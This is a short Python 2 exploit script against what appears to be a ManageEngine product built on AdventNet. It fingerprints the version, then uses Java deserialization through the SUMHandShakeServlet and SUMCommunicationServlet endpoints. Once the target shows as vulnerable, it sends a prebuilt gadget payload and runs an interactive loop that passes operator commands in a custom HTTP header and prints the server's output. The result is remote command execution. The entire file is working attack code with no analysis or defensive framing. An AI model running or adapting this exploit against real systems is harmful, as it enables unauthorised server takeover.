import requests
import sys
import re

requests.packages.urllib3.disable_warnings()

# proxy = {
#     "http": "http://127.0.0.1:8080",
#     "https" : "http://127.0.0.1:8080", 
# }

proxy = {
}

def exploit(url):
    # sesion
    session = requests.Session()
    response = session.get(url,proxies=proxy,verify=False)


    #check version
    p = re.compile("\s20[0-9]{2}\s")
    version = p.search(response.text).group().strip()
    print "Version: " + version

    # trigger requestHandler
    init = open("int.bin").read()
    trigger = session.post("%s/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet" % url,data=init,proxies=proxy,verify=False)
    encode = trigger.content.encode('hex') 

    # check Vuln
    if("aced0005" not in encode):
        print "[x]: Not Vulnerability"
        sys.exit(-1)

    # exploit
    gadget =open("gadget-%s.bin" % version,'rb').read()
    while True:
        cmd = raw_input("CMD: ")
        headers = {"me0me0hakxor":cmd}
        resp = session.post("%s/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet" % url,data=gadget,proxies=proxy,headers=headers,verify=False)
        print(resp.content)
        if cmd == "quit":
            print("Exiting ...")
            sys.exit(-1)



if __name__ == "__main__":
    url = sys.argv[1]
    exploit(url)